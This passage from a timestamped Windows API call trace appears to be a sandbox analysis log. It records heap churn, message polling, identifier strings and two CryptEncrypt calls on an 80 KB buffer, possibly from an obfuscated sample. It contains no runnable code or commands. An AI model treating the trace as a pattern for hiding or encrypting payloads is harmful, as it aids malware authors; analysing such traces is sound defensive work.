[0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0122.431] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0122.431] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.431] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2d0 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e00 [0122.431] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0122.432] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0122.432] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0122.432] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.433] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e00 | out: hHeap=0x2af0000) returned 1 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.433] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0122.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0122.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0122.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0122.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0122.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0122.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0122.434] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa300 [0122.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0122.434] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.434] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.434] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0122.434] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d3b50 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa240, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.438] CryptEncrypt (in: hKey=0x9a42c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13aff, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13b00) returned 1 [0122.438] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.438] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.438] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.438] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.438] CharLowerBuffW (in: lpsz="byte[80640]", cchLength=0xb | out: lpsz="byte[80640]") returned 0xb [0122.438] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.441] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.441] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.441] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.441] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.441] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa510, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.443] CryptEncrypt (in: hKey=0x9a42c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d3b50*, pdwDataLen=0x8cef60*=0x13aff, dwBufLen=0x13b00 | out: pbData=0x37d3b50*, pdwDataLen=0x8cef60*=0x13b00) returned 1 [0122.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0122.498] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0122.499] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0122.499] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0122.499] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0122.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.500] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.500] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.500] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 